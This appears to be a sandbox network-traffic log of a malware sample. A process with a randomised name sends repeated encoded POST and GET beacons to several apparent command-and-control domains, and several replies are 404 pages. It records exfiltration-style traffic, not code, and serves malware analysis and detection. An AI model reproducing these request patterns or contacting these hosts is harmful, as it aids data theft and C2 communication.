Nov 24, 2024 08:30:07.668456078 CET	760	OUT	POST /hkgx/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 210 Connection: close Host: www.xcvbj.asia Origin: http://www.xcvbj.asia Referer: http://www.xcvbj.asia/hkgx/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 64 63 33 2f 30 72 52 6a 35 44 6c 66 44 55 4f 46 72 6e 4f 6d 4b 4d 61 45 32 38 42 2f 44 6a 43 38 47 72 51 69 57 6c 4a 74 46 70 65 56 69 6b 44 48 53 67 6d 41 6d 63 75 6a 4d 49 67 32 6b 68 4e 45 67 67 59 44 31 6a 56 63 6f 51 38 74 6b 73 37 31 63 74 6c 37 4c 69 46 69 72 44 6a 78 6e 45 39 51 45 4d 53 46 52 46 54 36 59 64 31 64 50 55 73 4d 35 46 55 6d 51 76 68 43 74 47 56 72 4a 5a 72 4e 54 6c 4b 53 6a 46 4a 4b 42 4e 54 46 66 37 39 6e 70 35 4e 6d 2b 39 2b 47 68 44 6f 68 63 59 44 39 38 69 6c 66 6f 6a 6a 50 5a 66 41 6f 35 31 65 62 67 6c 4f 44 2f 74 4f 62 63 65 42 41 67 59 70 32 Data Ascii: ftMDw=9i9IKJ/Yinkpdc3/0rRj5DlfDUOFrnOmKMaE28B/DjC8GrQiWlJtFpeVikDHSgmAmcujMIg2khNEggYD1jVcoQ8tks71ctl7LiFirDjxnE9QEMSFRFT6Yd1dPUsM5FUmQvhCtGVrJZrNTlKSjFJKBNTFf79np5Nm+9+GhDohcYD98ilfojjPZfAo51ebglOD/tObceBAgYp2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	50005	149.88.81.190	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:30:10.365022898 CET	784	OUT	POST /hkgx/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 234 Connection: close Host: www.xcvbj.asia Origin: http://www.xcvbj.asia Referer: http://www.xcvbj.asia/hkgx/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 63 38 6e 2f 76 49 70 6a 79 44 6b 74 64 45 4f 46 6c 48 4f 71 4b 4d 57 45 32 39 46 76 43 52 57 38 47 50 41 69 58 67 6c 74 4c 4a 65 56 6f 45 44 43 50 77 6d 62 6d 63 6a 63 4d 4b 45 32 6b 68 5a 45 67 68 49 44 31 77 39 66 6f 41 38 76 38 63 37 7a 59 74 6c 37 4c 69 46 69 72 48 4b 57 6e 43 56 51 46 34 57 46 51 6b 54 39 52 39 31 65 5a 45 73 4d 79 6c 55 71 51 76 67 6e 74 48 59 4f 4a 63 76 4e 54 6e 43 53 69 51 39 56 4b 4e 54 66 62 37 38 54 71 6f 64 71 35 37 37 69 6e 44 45 38 43 72 37 65 35 55 34 46 30 51 6a 73 4c 50 67 71 35 33 47 70 67 46 4f 70 39 74 32 62 4f 4a 4e 6e 76 73 4d 56 37 41 53 67 39 64 71 75 48 59 6b 65 49 56 67 44 54 51 58 48 5a 41 3d 3d Data Ascii: ftMDw=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRW8GPAiXgltLJeVoEDCPwmbmcjcMKE2khZEghID1w9foA8v8c7zYtl7LiFirHKWnCVQF4WFQkT9R91eZEsMylUqQvgntHYOJcvNTnCSiQ9VKNTfb78Tqodq577inDE8Cr7e5U4F0QjsLPgq53GpgFOp9t2bOJNnvsMV7ASg9dquHYkeIVgDTQXHZA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	50006	149.88.81.190	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:30:13.030641079 CET	1797	OUT	POST /hkgx/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1246 Connection: close Host: www.xcvbj.asia Origin: http://www.xcvbj.asia Referer: http://www.xcvbj.asia/hkgx/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 63 38 6e 2f 76 49 70 6a 79 44 6b 74 64 45 4f 46 6c 48 4f 71 4b 4d 57 45 32 39 46 76 43 52 4f 38 47 34 6f 69 57 48 52 74 4b 4a 65 56 32 55 44 44 50 77 6e 4c 6d 63 37 59 4d 4b 34 49 6b 6a 68 45 68 42 55 44 69 78 39 66 69 41 38 76 31 38 37 79 63 74 6c 4c 4c 6a 31 63 72 44 57 57 6e 43 56 51 46 35 6d 46 47 46 54 39 58 39 31 64 50 55 74 44 35 46 56 39 51 76 35 61 74 48 4e 37 4a 49 62 4e 53 48 53 53 6b 69 6c 56 56 39 54 5a 63 37 38 4c 71 6f 51 30 35 37 50 41 6e 44 41 61 43 6f 6e 65 35 54 56 4e 75 54 48 58 65 70 34 74 6e 78 53 77 6f 31 47 69 34 2b 4b 47 47 4c 78 6c 74 76 4d 74 6a 48 4b 59 32 4c 6d 75 51 4f 4d 31 50 67 64 4b 5a 67 58 44 4a 78 74 45 63 32 42 46 65 49 66 77 4f 77 61 57 57 79 33 6b 64 48 63 54 4b 43 38 43 6b 51 50 55 44 57 49 78 35 69 2f 65 43 64 55 6c 36 2b 6f 59 30 2f 30 30 34 4c 46 49 59 71 78 71 63 4e 68 51 4e 35 53 35 77 32 6f 65 64 67 38 38 67 55 67 61 6a 33 4f 6f 67 65 61 76 41 41 49 75 4e 65 46 67 46 41 68 4d 6a 6a 5a 30 47 57 37 52 [TRUNCATED] Data Ascii: ftMDw=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRO8G4oiWHRtKJeV2UDDPwnLmc7YMK4IkjhEhBUDix9fiA8v187yctlLLj1crDWWnCVQF5mFGFT9X91dPUtD5FV9Qv5atHN7JIbNSHSSkilVV9TZc78LqoQ057PAnDAaCone5TVNuTHXep4tnxSwo1Gi4+KGGLxltvMtjHKY2LmuQOM1PgdKZgXDJxtEc2BFeIfwOwaWWy3kdHcTKC8CkQPUDWIx5i/eCdUl6+oY0/004LFIYqxqcNhQN5S5w2oedg88gUgaj3OogeavAAIuNeFgFAhMjjZ0GW7RZcbgxpZz/aM0mbUOmuK7K3KNqPm7Ejac2xlSSh6mnIxPPEZYMaEfWiE+9GqEbIC5JhuCRVqjkJjGxhyWVzQaWgEdVpM/7tVBHvdVyR2WqnpLZOVJvC9Dz8yXva9+MN0iZuGRV5keHdKf65p32YnZ1aztle1s6QC0GFfk9EG9BM37dOf7FJl8cSKs7vj9qLsR37SaZ4iCuiWfQnRm01Zl7quAKbHQfUd+hRCQKLAib5MPusft/R3D6YaxGkXxpGQNwqxiiyRMcRmwtztQvmrvJgOYY0Ru5I42WJSl157Vns02EzUenaW6M/FKaiBJEfikIoUJAuR/Mp64e+Osvbgs0gQ+RUuZx53moQLi+AIBzUKcNyRY+NvLv6kHxttgVf5X2gm4rRB3HNeS6IM6vsn+KJcEHSWsPOEzkifKx8uI5xIDzqE6TwVkpSdQe+zGxZoNctz1tHchTCvLoxj5ZloK/hfcaI0mPhuVZjF2fegcV8ztqTx7XCJUpuEhtIxSiba+zDSB8IhZaOoKvhejZlOWW0EjxM9gJG3pckrzxXxu/6/gLEOayDrnjUt494lFzWQYnrg/it74M488liFJv1tXJlCCKNx/JdoijN5lC8r5K8OHqYQJQMfr2XwwPibkR3NrIK1eMYudKmqhYeb6Uk3vMSgfeIp8QxCD7E [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	50007	149.88.81.190	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:30:15.732300997 CET	513	OUT	GET /hkgx/?ftMDw=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUhy4T4sTZM/xDRABQgnb1kzJGDsq+SUnMZJlWPAYumgJQLN5L2R8=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close Host: www.xcvbj.asia User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	50008	101.35.209.183	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:30:43.550069094 CET	769	OUT	POST /31pt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 210 Connection: close Host: www.yc791022.asia Origin: http://www.yc791022.asia Referer: http://www.yc791022.asia/31pt/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 32 43 35 5a 6e 4f 54 59 6b 2b 39 77 64 42 59 48 57 50 6c 51 6d 4c 37 38 37 4e 55 30 61 74 6f 31 37 62 63 38 79 50 4e 43 74 65 54 70 4c 7a 52 49 42 56 36 41 37 72 76 78 41 51 59 37 72 58 61 55 47 4d 79 53 55 39 36 39 55 6b 38 36 6b 68 59 78 55 76 63 63 6c 64 36 73 44 45 4c 4e 37 31 69 50 64 36 76 49 39 48 6f 2b 75 6e 4c 77 58 74 66 4f 4a 36 33 4e 67 58 36 34 66 47 42 75 58 6e 6a 54 75 6e 38 50 72 66 66 35 37 33 78 5a 48 42 59 53 48 73 65 66 72 37 66 4a 4f 67 58 6d 4c 53 4f 4d 71 45 70 78 34 32 41 68 4e 2f 54 6b 2f 68 2b 4f 70 5a 54 4f 44 4a 71 71 57 38 30 34 38 2f 4d 6e Data Ascii: ftMDw=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefr7fJOgXmLSOMqEpx42AhN/Tk/h+OpZTODJqqW8048/Mn
Nov 24, 2024 08:30:45.055460930 CET	427	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:30:44 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	50009	101.35.209.183	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:30:46.218153954 CET	793	OUT	POST /31pt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 234 Connection: close Host: www.yc791022.asia Origin: http://www.yc791022.asia Referer: http://www.yc791022.asia/31pt/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 63 31 2b 4f 67 38 7a 4e 6c 43 67 2b 54 70 54 44 52 4e 4d 31 36 39 37 72 7a 44 41 55 59 37 72 58 4f 55 47 4a 65 53 55 4b 75 36 55 30 38 30 72 42 59 6b 51 76 63 63 6c 64 36 73 44 46 76 6e 37 30 4b 50 64 49 37 49 38 6a 38 39 31 48 4c 78 55 74 66 4f 4e 36 33 4a 67 58 36 61 66 44 5a 49 58 69 76 54 75 6a 73 50 72 75 66 2b 78 33 78 66 59 52 5a 4e 41 4a 48 4a 6b 64 4f 47 4e 68 32 48 56 78 57 34 69 53 30 72 6b 46 41 43 66 76 7a 6d 2f 6a 6d 38 70 35 54 6b 42 4a 53 71 45 72 34 66 7a 4c 70 45 77 36 76 39 4c 7a 66 71 47 63 52 7a 4a 51 69 79 44 39 38 63 30 41 3d 3d Data Ascii: ftMDw=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafc1+Og8zNlCg+TpTDRNM1697rzDAUY7rXOUGJeSUKu6U080rBYkQvccld6sDFvn70KPdI7I8j891HLxUtfON63JgX6afDZIXivTujsPruf+x3xfYRZNAJHJkdOGNh2HVxW4iS0rkFACfvzm/jm8p5TkBJSqEr4fzLpEw6v9LzfqGcRzJQiyD98c0A==
Nov 24, 2024 08:30:47.680855036 CET	427	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:30:47 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	50010	101.35.209.183	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:30:48.902117014 CET	1806	OUT	POST /31pt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1246 Connection: close Host: www.yc791022.asia Origin: http://www.yc791022.asia Referer: http://www.yc791022.asia/31pt/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 6b 31 2b 59 55 38 79 71 35 43 68 2b 54 70 4e 7a 52 4d 4d 31 36 73 37 72 36 4b 41 55 56 45 72 56 32 55 48 72 57 53 63 66 43 36 66 30 38 30 7a 78 59 77 55 76 63 7a 6c 64 71 77 44 46 2f 6e 37 30 4b 50 64 4a 4c 49 38 33 6f 39 33 48 4c 77 58 74 66 53 4a 36 33 78 67 58 79 77 66 44 56 2b 58 52 6e 54 75 44 38 50 34 73 33 2b 73 6e 78 64 62 52 5a 46 41 4a 43 58 6b 5a 57 73 4e 68 44 71 56 7a 4b 34 30 33 59 39 6d 32 45 6f 63 4f 58 4a 6b 68 2b 75 70 35 66 62 50 2f 43 69 53 35 70 74 31 6f 4e 32 78 71 72 6c 42 69 61 77 4e 50 38 65 4b 31 79 74 49 75 5a 59 69 74 33 47 44 35 6d 37 38 44 48 6c 62 48 74 62 4b 62 48 74 5a 59 75 43 41 32 39 74 45 49 4b 4d 54 62 6b 4f 6f 6e 6c 5a 72 42 2f 36 48 6b 6c 6a 45 70 31 6b 4d 2b 62 6f 75 49 37 77 49 65 78 32 65 38 64 5a 77 4c 31 4b 73 55 77 6e 6e 42 2b 2b 75 64 7a 51 34 79 42 7a 46 4c 50 6e 79 48 4c 2f 39 6b 76 51 33 59 33 30 63 49 30 53 [TRUNCATED] Data Ascii: ftMDw=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafk1+YU8yq5Ch+TpNzRMM16s7r6KAUVErV2UHrWScfC6f080zxYwUvczldqwDF/n70KPdJLI83o93HLwXtfSJ63xgXywfDV+XRnTuD8P4s3+snxdbRZFAJCXkZWsNhDqVzK403Y9m2EocOXJkh+up5fbP/CiS5pt1oN2xqrlBiawNP8eK1ytIuZYit3GD5m78DHlbHtbKbHtZYuCA29tEIKMTbkOonlZrB/6HkljEp1kM+bouI7wIex2e8dZwL1KsUwnnB++udzQ4yBzFLPnyHL/9kvQ3Y30cI0STPb8AXlDLT9Pq1APbiubvKGvIlRnv6zOMgOj3LHyp0JIVitdaBPeU+Yv/nKn+W0iPtaJsGdaCXBN/nglw0ypBTO6k6y+l14kYjkyUfxOkTBgkmWPqYHDT+H8Ds7Cba5j1wISRV0yiPbwRcOdkG1qGoGapaQDAticxrsMhcWVj+6st4Yr5gy39xjj/F3XNL9yAbygTSOZewznWmyHEDNO/5RtA4G5xIjqCfb/DJQwdoEBU4oSEllN0PI1R2dqIBwfggWqeuMafF6eC3yrgRihaYTnQa6+ChBlzL1f5348gRCkmduUe15WVfkHhJ51mGZnFOhxKFMUdWJbzH+bPgDXtiRzbTFMhzwq3M9Bsxpw//JCg8oeQz7uXWV1T+l8IT0Kt/vMjTojmjswQtpjOaHJYBNMqiJVuftqqkL4VkTSQrcM1MNjQQO71xVlVlQpJ4tOIoi6/i5pd1MAm8/vEF2IOK81psNpVREQ4SQD2Hk/55+8lW6WNhI4ES6NN8LYaMBvW7HqlJmrfBE49+IT4gAcJdz9VgRUDENGrYQne1QuXJdSzPEBWUhfQzSia4wjZDEKaOZuEZLfb/aBV38ANKLN2aV7ql9qHBaiytCZfd89iq4rXcrx9nIR0UREZMh0ztGRQzMuv6tmlGHlwif2Lu4md/M9lpJ+dfh1/F [TRUNCATED]
Nov 24, 2024 08:30:50.416089058 CET	427	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:30:50 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	50011	101.35.209.183	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:30:51.568675041 CET	516	OUT	GET /31pt/?ftMDw=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/ZUs8uwlOB+QB3ca3FBmAxFrBZMPAxBodxEGaS/b2Tezz4FuYEzo=&s8q=0RJLtN5PAfjxwlrp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close Host: www.yc791022.asia User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Nov 24, 2024 08:30:53.156908989 CET	427	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:30:52 GMT Server: Apache Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	50012	38.47.232.202	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:30:59.025260925 CET	757	OUT	POST /p3j6/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 210 Connection: close Host: www.43kdd.top Origin: http://www.43kdd.top Referer: http://www.43kdd.top/p3j6/ User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 Data Raw: 66 74 4d 44 77 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 32 32 64 54 45 62 59 49 73 5a 48 6e 75 79 6b 64 4b 72 34 55 6c 42 61 55 39 79 4c 68 54 6a 71 35 63 6f 7a 71 33 76 45 2f 32 56 4c 53 57 65 4f 33 4f 4e 37 62 36 7a 78 49 49 6e 75 58 78 66 41 36 65 41 58 2f 6d 48 49 41 57 7a 41 52 6a 4f 37 36 74 34 33 75 49 59 6e 43 4d 52 52 36 43 50 51 30 6b 6e 4a 72 49 47 4d 71 4b 61 6f 5a 53 63 39 62 79 52 57 65 71 49 71 2b 6a 76 57 78 4e 79 6b 67 67 51 6e 64 6d 78 57 38 32 44 49 53 4c 59 32 74 36 54 41 36 49 58 7a 4d 65 39 79 50 47 38 65 77 44 4e 38 4b 50 74 68 6c 6e 73 73 65 4e 74 38 42 61 35 35 74 55 4b 62 66 74 54 66 67 32 6e 64 Data Ascii: ftMDw=DX5WBz7Pi8kdj22dTEbYIsZHnuykdKr4UlBaU9yLhTjq5cozq3vE/2VLSWeO3ON7b6zxIInuXxfA6eAX/mHIAWzARjO76t43uIYnCMRR6CPQ0knJrIGMqKaoZSc9byRWeqIq+jvWxNykggQndmxW82DISLY2t6TA6IXzMe9yPG8ewDN8KPthlnsseNt8Ba55tUKbftTfg2nd
